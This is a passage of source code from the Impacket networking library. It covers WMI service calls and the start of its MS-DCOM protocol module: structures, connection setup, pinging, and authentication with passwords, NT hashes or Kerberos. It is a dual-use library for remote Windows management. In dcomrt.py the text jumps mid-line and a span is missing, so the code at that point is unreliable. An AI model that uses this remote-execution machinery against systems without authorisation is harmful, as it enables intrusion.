request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return IEnumWbemClassObject(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()), self)\n\n def ExecQueryAsync(self, strQuery, lFlags=0, pCtx=NULL):\n request = IWbemServices_ExecQueryAsync()\n request['strQueryLanguage']['asData'] = checkNullString('WQL')\n request['strQuery']['asData'] = checkNullString(strQuery)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def ExecNotificationQuery(self, strQuery, lFlags=0, pCtx=NULL):\n request = IWbemServices_ExecNotificationQuery()\n request['strQueryLanguage']['asData'] = checkNullString('WQL')\n request['strQuery']['asData'] = checkNullString(strQuery)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return IEnumWbemClassObject(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()), self)\n\n def ExecNotificationQueryAsync(self, strQuery, lFlags=0, pCtx=NULL):\n request = IWbemServices_ExecNotificationQueryAsync()\n request['strQueryLanguage']['asData'] = checkNullString('WQL')\n request['strQuery']['asData'] = checkNullString(strQuery)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def ExecMethod(self, strObjectPath, strMethodName, lFlags=0, pCtx=NULL, pInParams=NULL, ppOutParams=NULL):\n request = IWbemServices_ExecMethod()\n request['strObjectPath']['asData'] = checkNullString(strObjectPath)\n request['strMethodName']['asData'] = checkNullString(strMethodName)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n if pInParams is NULL:\n request['pInParams'] = pInParams\n else:\n request['pInParams']['ulCntData'] = len(pInParams)\n request['pInParams']['abData'] = list(pInParams.getData())\n\n request.fields['ppCallResult'] = NULL\n if ppOutParams is NULL:\n request.fields['ppOutParams'].fields['Data'] = NULL\n else:\n request['ppOutParams']['ulCntData'] = len(ppOutParams.getData())\n request['ppOutParams']['abData'] = list(ppOutParams.getData())\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return IWbemClassObject(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppOutParams']['abData']), self.get_ipidRemUnknown(),\n oxid=self.get_oxid(), target=self.get_target()))\n\n def ExecMethodAsync(self, strObjectPath, strMethodName, lFlags=0, pCtx=NULL, pInParams=NULL):\n request = IWbemServices_ExecMethodAsync()\n request['strObjectPath']['asData'] = checkNullString(strObjectPath)\n request['strMethodName']['asData'] = checkNullString(strMethodName)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n request['pInParams'] = pInParams\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\nclass IWbemLevel1Login(IRemUnknown):\n def __init__(self, interface):\n IRemUnknown.__init__(self,interface)\n self._iid = IID_IWbemLevel1Login\n\n def EstablishPosition(self):\n request = IWbemLevel1Login_EstablishPosition()\n request['reserved1'] = NULL\n request['reserved2'] = 0\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp['LocaleVersion']\n\n def RequestChallenge(self):\n request = IWbemLevel1Login_RequestChallenge()\n request['reserved1'] = NULL\n request['reserved2'] = NULL\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp['reserved3']\n\n def WBEMLogin(self):\n request = IWbemLevel1Login_WBEMLogin()\n request['reserved1'] = NULL\n request['reserved2'] = NULL\n request['reserved3'] = 0\n request['reserved4'] = NULL\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp['reserved5']\n\n def NTLMLogin(self, wszNetworkResource, wszPreferredLocale, pCtx):\n request = IWbemLevel1Login_NTLMLogin()\n request['wszNetworkResource'] = checkNullString(wszNetworkResource)\n request['wszPreferredLocale'] = checkNullString(wszPreferredLocale)\n request['lFlags'] = 0\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return IWbemServices(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppNamespace']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()))\n\n\nif __name__ == '__main__':\n # Example 1\n baseClass = b'xV4\\x12\\xd0\\x00\\x00\\x00\\x05\\x00DPRAVAT-DEV\\x00\\x00ROOT\\x00\\x1d\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\n\\x00\\x00\\x00\\x05\\xff\\xff\\xff\\xff<\\x00\\x00\\x80\\x00Base\\x00\\x00Id\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\n\\x00\\x00\\x80\\x03\\x08\\x00\\x00\\x004\\x00\\x00\\x00\\x01\\x00\\x00\\x80\\x13\\x0b\\x00\\x00\\x00\\xff\\xff\\x00sint32\\x00\\x0c\\x00\\x00\\x00\\x00\\x004\\x00\\x00\\x00\\x00\\x80\\x00\\x80\\x13\\x0b\\x00\\x00\\x00\\xff\\xff\\x00sint32\\x00'\n\n #encodingUnit = ENCODING_UNIT(baseClass)\n #encodingUnit.dump()\n #encodingUnit['ObjectBlock'].printInformation()\n #print \"LEN \", len(baseClass), len(encodingUnit)\n\n #myClass = b\"xV4\\x12.\\x02\\x00\\x00\\x05\\x00DPRAVAT-DEV\\x00\\x00ROOT\\x00f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\n\\x00\\x00\\x00\\x05\\xff\\xff\\xff\\xff<\\x00\\x00\\x80\\x00Base\\x00\\x00Id\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\n\\x00\\x00\\x80\\x03\\x08\\x00\\x00\\x004\\x00\\x00\\x00\\x01\\x00\\x00\\x80\\x13\\x0b\\x00\\x00\\x00\\xff\\xff\\x00sint32\\x00\\x0c\\x00\\x00\\x00\\x00\\x004\\x00\\x00\\x00\\x00\\x80v\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x0e\\x00\\x00\\x00\\x00Base\\x00\\x06\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\t\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x16\\x00\\x00\\x00\\x04\\x00\\x00\\x00'\\x00\\x00\\x00.\\x00\\x00\\x00U\\x00\\x00\\x00\\\\\\x00\\x00\\x00\\x99\\x00\\x00\\x00\\xa0\\x00\\x00\\x00\\xc7\\x00\\x00\\x00\\xcb\\x00\\x00\\x00G\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xfd\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x11\\x01\\x00\\x80\\x00MyClass\\x00\\x00Description\\x00\\x00MyClass Example\\x00\\x00Array\\x00\\x13 \\x00\\x00\\x03\\x00\\x0c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\n\\x00\\x00\\x80\\x03\\x08\\x00\\x00\\x00M\\x00\\x00\\x00\\x00uint32\\x00\\x00Data1\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00'\\x00\\x00\\x00\\n\\x00\\x00\\x80\\x03\\x08\\x00\\x00\\x00\\x91\\x00\\x00\\x00\\x03\\x00\\x00\\x80\\x00\\x0b\\x00\\x00\\x00\\xff\\xff\\x04\\x00\\x00\\x80\\x00\\x0b\\x00\\x00\\x00\\xff\\xff\\x00string\\x00\\x00Data2\\x00\\x08\\x00\\x00\\x00\\x02\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\n\\x00\\x00\\x80\\x03\\x08\\x00\\x00\\x00\\xbf\\x00\\x00\\x00\\x00string\\x00\\x00Id\\x00\\x03@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\n\\x00\\x00\\x80#\\x08\\x00\\x00\\x00\\xf5\\x00\\x00\\x00\\x01\\x00\\x00\\x803\\x0b\\x00\\x00\\x00\\xff\\xff\\x00sint32\\x00\\x00defaultValue\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00s\\x00\\x00\\x00\\x802\\x00\\x00defaultValue\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\"\n #hexdump(myClass)\n #encodingUnit = ENCODING_UNIT(myClass)\n #print \"LEN \", len(myClass), len(encodingUnit)\n #encodingUnit.dump()\n #encodingUnit['ObjectBlock'].printInformation()\n\n #instanceMyClass = b\"xV4\\x12\\xd3\\x01\\x00\\x00\\x06\\x00DPRAVAT-DEV\\x00\\x00ROOT\\x00v\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x0e\\x00\\x00\\x00\\x00Base\\x00\\x06\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\t\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x16\\x00\\x00\\x00\\x04\\x00\\x00\\x00'\\x00\\x00\\x00.\\x00\\x00\\x00U\\x00\\x00\\x00\\\\\\x00\\x00\\x00\\x99\\x00\\x00\\x00\\xa0\\x00\\x00\\x00\\xc7\\x00\\x00\\x00\\xcb\\x00\\x00\\x00G\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xfd\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x11\\x01\\x00\\x80\\x00MyClass\\x00\\x00Description\\x00\\x00MyClass Example\\x00\\x00Array\\x00\\x13 \\x00\\x00\\x03\\x00\\x0c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\n\\x00\\x00\\x80\\x03\\x08\\x00\\x00\\x00M\\x00\\x00\\x00\\x00uint32\\x00\\x00Data1\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00'\\x00\\x00\\x00\\n\\x00\\x00\\x80\\x03\\x08\\x00\\x00\\x00\\x91\\x00\\x00\\x00\\x03\\x00\\x00\\x80\\x00\\x0b\\x00\\x00\\x00\\xff\\xff\\x04\\x00\\x00\\x80\\x00\\x0b\\x00\\x00\\x00\\xff\\xff\\x00string\\x00\\x00Data2\\x00\\x08\\x00\\x00\\x00\\x02\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\n\\x00\\x00\\x80\\x03\\x08\\x00\\x00\\x00\\xbf\\x00\\x00\\x00\\x00string\\x00\\x00Id\\x00\\x03@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\n\\x00\\x00\\x80#\\x08\\x00\\x00\\x00\\xf5\\x00\\x00\\x00\\x01\\x00\\x00\\x803\\x0b\\x00\\x00\\x00\\xff\\xff\\x00sint32\\x00\\x00defaultValue\\x00\\x00\\x00\\x00\\x00\\x00\\x00I\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 {\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\t\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x01&\\x00\\x00\\x80\\x00MyClass\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00StringField\\x00\"\n #encodingUnit = ENCODING_UNIT(instanceMyClass)\n #encodingUnit.dump()\n #encodingUnit['ObjectBlock'].printInformation()\n" }, { "path": "impacket/dcerpc/v5/dcomrt.py", "content": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-DCOM] Interface implementation\n#\n# Best way to learn how to use these calls is to grab the protocol standard\n# so you understand what the call does, and then read the test case located\n# at https://github.com/fortra/impacket/tree/master/tests/SMB_RPC\n#\n# Some calls have helper functions, which makes it even easier to use.\n# They are located at the end of this file.\n# Helper functions start with \"h\".\n# There are test cases for them too.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# ToDo:\n# [X] Use the same DCE connection for all the calls. Right now is connecting to the remote machine\n# for each call, making it slower.\n# [X] Implement a ping mechanism, otherwise the garbage collector at the server shuts down the objects if\n# not used, returning RPC_E_DISCONNECTED\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport socket\nfrom struct import pack\nfrom threading import Timer, current_thread\n\nfrom impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRTLSTRUCT, UNKNOWNDATA\nfrom impacket.dcerpc.v5.dtypes import LPWSTR, ULONGLONG, HRESULT, GUID, USHORT, WSTR, DWORD, LPLONG, LONG, PGUID, ULONG, \\\n UUID, WIDESTR, NULL\nfrom impacket import hresult_errors, LOG\nfrom impacket.uuid import string_to_bin, uuidtup_to_bin, generate\nfrom impacket.dcerpc.v5.rpcrt import TypeSerialization1, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_NONE, \\\n RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_WINNT, DCERPCException\nfrom impacket.dcerpc.v5 import transport\n\nCLSID_ActivationContextInfo = string_to_bin('000001a5-0000-0000-c000-000000000046')\nCLSID_ActivationPropertiesIn = string_to_bin('00000338-0000-0000-c000-000000000046')\nCLSID_ActivationPropertiesOut = string_to_bin('00000339-0000-0000-c000-000000000046')\nCLSID_CONTEXT_EXTENSION = string_to_bin('00000334-0000-0000-c000-000000000046')\nCLSID_ContextMarshaler = string_to_bin('0000033b-0000-0000-c000-000000000046')\nCLSID_ERROR_EXTENSION = string_to_bin('0000031c-0000-0000-c000-000000000046')\nCLSID_ErrorObject = string_to_bin('0000031b-0000-0000-c000-000000000046')\nCLSID_InstanceInfo = string_to_bin('000001ad-0000-0000-c000-000000000046')\nCLSID_InstantiationInfo = string_to_bin('000001ab-0000-0000-c000-000000000046')\nCLSID_PropsOutInfo = string_to_bin('00000339-0000-0000-c000-000000000046')\nCLSID_ScmReplyInfo = string_to_bin('000001b6-0000-0000-c000-000000000046')\nCLSID_ScmRequestInfo = string_to_bin('000001aa-0000-0000-c000-000000000046')\nCLSID_SecurityInfo = string_to_bin('000001a6-0000-0000-c000-000000000046')\nCLSID_ServerLocationInfo = string_to_bin('000001a4-0000-0000-c000-000000000046')\nCLSID_SpecialSystemProperties = string_to_bin('000001b9-0000-0000-c000-000000000046')\nIID_IActivation = uuidtup_to_bin(('4d9f4ab8-7d1c-11cf-861e-0020af6e7c57','0.0'))\nIID_IActivationPropertiesIn = uuidtup_to_bin(('000001A2-0000-0000-C000-000000000046','0.0'))\nIID_IActivationPropertiesOut = uuidtup_to_bin(('000001A3-0000-0000-C000-000000000046','0.0'))\nIID_IContext = uuidtup_to_bin(('000001c0-0000-0000-C000-000000000046','0.0'))\nIID_IObjectExporter = uuidtup_to_bin(('99fcfec4-5260-101b-bbcb-00aa0021347a','0.0'))\nIID_IRemoteSCMActivator = uuidtup_to_bin(('000001A0-0000-0000-C000-000000000046','0.0'))\nIID_IRemUnknown = uuidtup_to_bin(('00000131-0000-0000-C000-000000000046','0.0'))\nIID_IRemUnknown2 = uuidtup_to_bin(('00000143-0000-0000-C000-000000000046','0.0'))\nIID_IUnknown = uuidtup_to_bin(('00000000-0000-0000-C000-000000000046','0.0'))\nIID_IClassFactory = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046','0.0'))\n\n# Protocol Identifiers, from [c706] Annex I\nTOWERID_OSI_TP4 = 0x05\nTOWERID_OSI_CLNS = 0x06\nTOWERID_DOD_TCP = 0x0007\nTOWERID_DOD_UDP = 0x08\nTOWERID_DOD_IP = 0x09\nTOWERID_RPC_connectionless = 0x0a\nTOWERID_RPC_connectionoriented = 0x0b\nTOWERID_DNA_Session_Control = 0x02\nTOWERID_DNA_Session_Control_V3 = 0x03\nTOWERID_DNA_NSP_Transport = 0x04\nTOWERID_DNA_Routing = 0x06\nTOWERID_Named_Pipes = 0x10\nTOWERID_NetBIOS_11 = 0x11\nTOWERID_NetBEUI = 0x12\nTOWERID_Netware_SPX = 0x13\nTOWERID_Netware_IPX = 0x14\nTOWERID_Appletalk_Stream = 0x16\nTOWERID_Appletalk_Datagram = 0x17\nTOWERID_Appletalk = 0x18\nTOWERID_NetBIOS_19 = 0x19\nTOWERID_VINES_SPP = 0x1A\nTOWERID_VINES_IPC = 0x1B\nTOWERID_StreetTalk = 0x1C\nTOWERID_Unix_Domain_socket = 0x20\nTOWERID_null = 0x21\nTOWERID_NetBIOS_22 = 0x22\n\nclass DCERPCSessionError(DCERPCException):\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n\n def __str__( self ):\n if self.error_code in hresult_errors.ERROR_MESSAGES:\n error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]\n error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1]\n return 'DCOM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)\n else:\n return 'DCOM SessionError: unknown error code: 0x%x' % self.error_code\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 2.2.1 OID\nOID = ULONGLONG\n\nclass OID_ARRAY(NDRUniConformantArray):\n item = OID\n\nclass POID_ARRAY(NDRPOINTER):\n referent = (\n ('Data', OID_ARRAY),\n )\n\n# 2.2.2 SETID\nSETID = ULONGLONG\n\n# 2.2.4 error_status_t\nerror_status_t = ULONG\n\n# 2.2.6 CID\nCID = GUID\n\n# 2.2.7 CLSID\nCLSID = GUID\n\n# 2.2.8 IID\nIID = GUID\nPIID = PGUID\n\n# 2.2.9 IPID\nIPID = GUID\n\n# 2.2.10 OXID\nOXID = ULONGLONG\n\n# 2.2.18 OBJREF\nFLAGS_OBJREF_STANDARD = 0x00000001\nFLAGS_OBJREF_HANDLER = 0x00000002\nFLAGS_OBJREF_CUSTOM = 0x00000004\nFLAGS_OBJREF_EXTENDED = 0x00000008\n\n# 2.2.18.1 STDOBJREF\nSORF_NOPING = 0x00001000\n\n# 2.2.20 Context\nCTXMSHLFLAGS_BYVAL = 0x00000002\n\n# 2.2.20.1 PROPMARSHALHEADER\nCPFLAG_PROPAGATE = 0x00000001\nCPFLAG_EXPOSE = 0x00000002\nCPFLAG_ENVOY = 0x00000004\n\n# 2.2.22.2.1 InstantiationInfoData\nACTVFLAGS_DISABLE_AAA = 0x00000002\nACTVFLAGS_ACTIVATE_32_BIT_SERVER = 0x00000004\nACTVFLAGS_ACTIVATE_64_BIT_SERVER = 0x00000008\nACTVFLAGS_NO_FAILURE_LOG = 0x00000020\n\n# 2.2.22.2.2 SpecialPropertiesData\nSPD_FLAG_USE_CONSOLE_SESSION = 0x00000001\n\n# 2.2.28.1 IDL Range Constants\nMAX_REQUESTED_INTERFACES = 0x8000\nMAX_REQUESTED_PROTSEQS = 0x8000\nMIN_ACTPROP_LIMIT = 1\nMAX_ACTPROP_LIMIT = 10\n\n################################################################################\n# STRUCTURES\n################################################################################\nclass handle_t(NDRSTRUCT):\n structure = (\n ('context_handle_attributes',ULONG),\n ('context_handle_uuid',UUID),\n )\n\n def __init__(self, data=None, isNDR64=False):\n NDRSTRUCT.__init__(self, data, isNDR64)\n self['context_handle_uuid'] = b'\\x00'*16\n\n def isNull(self):\n return self['context_handle_uuid'] == b'\\x00'*16\n\n# 2.2.11 COMVERSION\nclass COMVERSION(NDRSTRUCT):\n default_major_version = 5\n default_minor_version = 7\n\n structure = (\n ('MajorVersion',USHORT),\n ('MinorVersion',USHORT),\n )\n\n @classmethod\n def set_default_version(cls, major_version=None, minor_version=None):\n # Set default dcom version for all new COMVERSION objects.\n if major_version is not None:\n cls.default_major_version = major_version\n if minor_version is not None:\n cls.default_minor_version = minor_version\n\n def __init__(self, data = None,isNDR64 = False):\n NDRSTRUCT.__init__(self, data, isNDR64)\n if data is None:\n self['MajorVersion'] = self.default_major_version\n self['MinorVersion'] = self.default_minor_version\n\nclass PCOMVERSION(NDRPOINTER):\n referent = (\n ('Data', COMVERSION),\n )\n\n# 2.2.13.1 ORPC_EXTENT\n# This MUST contain an array of bytes that form the extent data. \n# The array size MUST be a multiple of 8 for alignment reasons.\nclass BYTE_ARRAY(NDRUniConformantArray):\n item = 'c'\n\nclass ORPC_EXTENT(NDRSTRUCT):\n structure = (\n ('id',GUID),\n ('size',ULONG),\n ('data',BYTE_ARRAY),\n )\n\n# 2.2.13.2 ORPC_EXTENT_ARRAY\n# ThisMUSTbeanarrayofORPC_EXTENTs.ThearraysizeMUSTbeamultipleof2for alignment reasons.\nclass PORPC_EXTENT(NDRPOINTER):\n referent = (\n ('Data', ORPC_EXTENT),\n )\n\nclass EXTENT_ARRAY(NDRUniConformantArray):\n item = PORPC_EXTENT\n\nclass PEXTENT_ARRAY(NDRPOINTER):\n referent = (\n ('Data', EXTENT_ARRAY),\n )\n\nclass ORPC_EXTENT_ARRAY(NDRSTRUCT):\n structure = (\n ('size',ULONG),\n ('reserved',ULONG),\n ('extent',PEXTENT_ARRAY),\n )\n\nclass PORPC_EXTENT_ARRAY(NDRPOINTER):\n referent = (\n ('Data', ORPC_EXTENT_ARRAY),\n )\n\n# 2.2.13.3 ORPCTHIS\nclass ORPCTHIS(NDRSTRUCT):\n structure = (\n ('version',COMVERSION),\n ('flags',ULONG),\n ('reserved1',ULONG),\n ('cid',CID),\n ('extensions',PORPC_EXTENT_ARRAY),\n )\n\n# 2.2.13.4 ORPCTHAT\nclass ORPCTHAT(NDRSTRUCT):\n structure = (\n ('flags',ULONG),\n ('extensions',PORPC_EXTENT_ARRAY),\n )\n\n# 2.2.14 MInterfacePointer\nclass MInterfacePointer(NDRSTRUCT):\n structure = (\n ('ulCntData',ULONG),\n ('abData',BYTE_ARRAY),\n )\n\n# 2.2.15 PMInterfacePointerInternal\nclass PMInterfacePointerInternal(NDRPOINTER):\n referent = (\n ('Data', MInterfacePointer),\n )\n\n# 2.2.16 PMInterfacePointer\nclass PMInterfacePointer(NDRPOINTER):\n referent = (\n ('Data', MInterfacePointer),\n )\n\nclass PPMInterfacePointer(NDRPOINTER):\n referent = (\n ('Data', PMInterfacePointer),\n )\n\n# 2.2.18 OBJREF\nclass OBJREF(NDRSTRUCT):\n commonHdr = (\n ('signature',ULONG),\n ('flags',ULONG),\n ('iid',GUID),\n )\n def __init__(self, data = None,isNDR64 = False):\n NDRSTRUCT.__init__(self, data, isNDR64)\n if data is None:\n self['signature'] = 0x574F454D\n\n# 2.2.18.1 STDOBJREF\nclass STDOBJREF(NDRSTRUCT):\n structure = (\n ('flags',ULONG),\n ('cPublicRefs',ULONG),\n ('oxid',OXID),\n ('oid',OID),\n ('ipid',IPID),\n )\n\n# 2.2.18.4 OBJREF_STANDARD\nclass OBJREF_STANDARD(OBJREF):\n structure = (\n ('std',STDOBJREF),\n ('saResAddr',':'),\n )\n def __init__(self, data = None,isNDR64 = False):\n OBJREF.__init__(self, data, isNDR64)\n if data is None:\n self['flags'] = FLAGS_OBJREF_STANDARD\n\n# 2.2.18.5 OBJREF_HANDLER\nclass OBJREF_HANDLER(OBJREF):\n structure = (\n ('std',STDOBJREF),\n ('clsid',CLSID),\n ('saResAddr',':'),\n )\n def __init__(self, data = None,isNDR64 = False):\n OBJREF.__init__(self, data, isNDR64)\n if data is None:\n self['flags'] = FLAGS_OBJREF_HANDLER\n\n# 2.2.18.6 OBJREF_CUSTOM\nclass OBJREF_CUSTOM(OBJREF):\n structure = (\n ('clsid',CLSID),\n ('cbExtension',ULONG),\n ('ObjectReferenceSize',ULONG),\n ('pObjectData',':'),\n )\n def __init__(self, data = None,isNDR64 = False):\n OBJREF.__init__(self, data, isNDR64)\n if data is None:\n self['flags'] = FLAGS_OBJREF_CUSTOM\n\n# 2.2.18.8 DATAELEMENT\nclass DATAELEMENT(NDRSTRUCT):\n structure = (\n ('dataID',GUID),\n ('cbSize',ULONG),\n ('cbRounded',ULONG),\n ('Data',':'),\n )\n\nclass DUALSTRINGARRAYPACKED(NDRSTRUCT):\n structure = (\n ('wNumEntries',USHORT),\n ('wSecurityOffset',USHORT),\n ('aStringArray',':'),\n )\n def getDataLen(self, data, offset=0):\n return self['wNumEntries']*2\n\n# 2.2.18.7 OBJREF_EXTENDED\nclass OBJREF_EXTENDED(OBJREF):\n structure = (\n ('std',STDOBJREF),\n ('Signature1',ULONG),\n ('saResAddr',DUALSTRINGARRAYPACKED),\n ('nElms',ULONG),\n ('Signature2',ULONG),\n ('ElmArray',DATAELEMENT),\n )\n def __init__(self, data = None, isNDR64 = False):\n OBJREF.__init__(self, data, isNDR64)\n if data is None:\n self['flags'] = FLAGS_OBJREF_EXTENDED\n self['Signature1'] = 0x4E535956\n self['Signature1'] = 0x4E535956\n self['nElms'] = 0x4E535956\n\n# 2.2.19 DUALSTRINGARRAY\nclass USHORT_ARRAY(NDRUniConformantArray):\n item = ' 0 or len(deletedOids) > 0:\n if 'setid' in DCOMConnection.OID_SET[target]:\n setId = DCOMConnection.OID_SET[target]['setid']\n else:\n setId = 0\n resp = objExporter.ComplexPing(setId, 0, addedOids, deletedOids)\n DCOMConnection.OID_SET[target]['oids'] -= deletedOids\n DCOMConnection.OID_SET[target]['oids'] |= addedOids\n DCOMConnection.OID_SET[target]['setid'] = resp['pSetId']\n else:\n objExporter.SimplePing(DCOMConnection.OID_SET[target]['setid'])\n except Exception as e:\n # There might be exceptions when sending packets \n # We should try to continue tho.\n LOG.error(str(e))\n pass\n\n DCOMConnection.PINGTIMER = Timer(120,DCOMConnection.pingServer)\n try:\n DCOMConnection.PINGTIMER.start()\n except Exception as e:\n if str(e).find('threads can only be started once') < 0:\n raise e\n\n def initTimer(self):\n if self.__oxidResolver is True:\n if DCOMConnection.PINGTIMER is None:\n DCOMConnection.PINGTIMER = Timer(120, DCOMConnection.pingServer)\n try:\n DCOMConnection.PINGTIMER.start()\n except Exception as e:\n if str(e).find('threads can only be started once') < 0:\n raise e\n\n def initConnection(self):\n stringBinding = r'ncacn_ip_tcp:%s' % self.__target\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n\n if self.__remoteHost:\n rpctransport.setRemoteHost(self.__remoteHost)\n rpctransport.setRemoteName(self.__target)\n\n if hasattr(rpctransport, 'set_credentials') and len(self.__userName) >=0:\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(self.__userName, self.__password, self.__domain, self.__lmhash, self.__nthash,\n self.__aesKey, self.__TGT, self.__TGS)\n rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n self.__portmap = rpctransport.get_dce_rpc()\n self.__portmap.set_auth_level(self.__authLevel)\n if self.__doKerberos is True:\n self.__portmap.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n self.__portmap.connect()\n DCOMConnection.PORTMAPS[self.__target] = self.__portmap\n\n def CoCreateInstanceEx(self, clsid, iid):\n scm = IRemoteSCMActivator(self.__portmap)\n iInterface = scm.RemoteCreateInstance(clsid, iid)\n self.initTimer()\n return iInterface\n\n def get_dce_rpc(self):\n return DCOMConnection.PORTMAPS[self.__target]\n\n def disconnect(self):\n # https://github.com/fortra/impacket/issues/1039\n if self.__target in DCOMConnection.PORTMAPS.keys():\n del(DCOMConnection.PORTMAPS[self.__target])\n if self.__target in DCOMConnection.OID_SET.keys():\n del(DCOMConnection.OID_SET[self.__target])\n if DCOMConnection.PINGTIMER and len(DCOMConnection.PORTMAPS) == 0:\n DCOMConnection.PINGTIMER.cancel()\n DCOMConnection.PINGTIMER.join()\n DCOMConnection.PINGTIMER = None\n if self.__target in INTERFACE.CONNECTIONS:\n del(INTERFACE.CONNECTIONS[self.__target][current_thread().name])\n self.__portmap.disconnect()\n #print INTERFACE.CONNECTIONS\n\nclass CLASS_INSTANCE:\n def __init__(self, ORPCthis, stringBinding):\n self.__stringBindings = stringBinding\n self.__ORPCthis = ORPCthis\n self.__authType = RPC_C_AUTHN_WINNT\n self.__authLevel = RPC_C_AUTHN_LEVEL_PKT_PRIVACY\n def get_ORPCthis(self):\n return self.__ORPCthis\n def get_string_bindings(self):\n return self.__stringBindings\n def get_auth_level(self):\n if RPC_C_AUTHN_LEVEL_NONE < self.__authLevel < RPC_C_AUTHN_LEVEL_PKT_PRIVACY:\n if self.__authType == RPC_C_AUTHN_WINNT:\n return RPC_C_AUTHN_LEVEL_PKT_INTEGRITY\n else:\n return 